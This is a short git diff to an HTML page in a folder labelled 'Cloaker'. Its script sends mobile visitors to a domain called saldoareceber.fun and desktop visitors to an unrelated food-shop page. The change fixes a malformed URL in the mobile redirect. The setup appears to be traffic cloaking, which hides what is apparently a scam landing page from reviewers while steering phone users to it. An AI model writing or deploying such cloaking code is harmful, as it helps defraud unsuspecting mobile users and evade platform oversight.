--- a/Códigos-Lucrativos/Ct-84/Cloaker/index.html
+++ b/Códigos-Lucrativos/Ct-84/Cloaker/index.html
@@ -7,7 +7,7 @@
     <script type="text/javascript">
         // Verifica o tipo de dispositivo com base no User-Agent
         if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
-            window.location.href = "https://saldoareceber.fun/https://saldoareceber.fun/Códigos-Lucrativos/Ct-84/oficial/inicio/index.html"; // Dispositivo móvel
+            window.location.href = "https://saldoareceber.fun/Códigos-Lucrativos/Ct-84/oficial/inicio/index.html"; // Dispositivo móvel
         } else {
             window.location.href = "https://www.livup.com.br/ingredientes/maca"; // Desktop
         }
